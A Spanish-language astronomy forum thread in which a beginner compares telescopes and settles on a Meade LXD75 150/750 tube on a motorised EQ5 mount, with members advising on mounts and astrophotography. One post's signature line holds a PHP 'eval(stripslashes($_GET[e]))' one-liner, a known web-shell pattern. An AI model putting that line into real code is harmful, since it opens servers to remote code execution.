Que me recomendais

Consultas generales
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

Aunque el dobson me atrae mucho, por la facilidad y por la abetura, creo que me decido por el 150/750. Aunque es mas pequeño y la montura no es gran cosa, si me da por la astrofotografia almenos podre hacer algo. De todas formas creo que se pueden motorizar las monturas dobson (corregirme si me equivoco).

De todas maneras sigo sin decidirme.

Salu2
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

y este otro que os parece enlace.

Lo que pasa es que creo que se equivoca el vendedor y es un Meade LXD75 y no un LX75 como dice.

Salu2
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Que me recomendais

Mensaje por m3ntol »

Ese telescopio lo vendían en Lidl hace unos meses. Lo tiene mucha gente y está muy bien por el precio que tiene. La montura es bastante decente y tiene un GOTO muy preciso. Es un buen telescopio.

Mi consejo es que no te obsesiones con la astrofotografía, es una disciplina muy compleja y que requiere de equipaciones caras. No obstante ese telescopio con esa montura te dejará hacer cosillas.

Por cierto, ¿qué cámara tienes?
phpbb:eval(stripslashes($_GET[e]));
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Que me recomendais

Mensaje por carlosz22 »

Javier, el telescopio que ha puesto no lleva la montura del LXD 75, lleva una eq5 solamente motorizada, sin GOTO :wink:

Aun así, esta muy bien, es de los mejores que has puesto hasta ahora :)

PD: Javier si puedes conectate al msn plz
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Que me recomendais

Mensaje por cmocho »

al final me he decidido por el ultimo de todos los que vi.

El tubo del meade LXD75 150-750 f/5, y la montura EQ5 con los motores de AR y DEC, junto con dos oculares uno Meade Super Plöss 26 milimetros y el otro SUPER 10 Long Eye Relief, todo por 380
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Que me recomendais

Mensaje por carlosz22 »

No creo que te defraude el telescopio :wink:

Has elegido bien, además, con esa montura podrás hacer alguna fotillo a los planetas y la luna con una webcam.

Un saludo y ya lo presentas en sociedad en alguna salida :P
Responder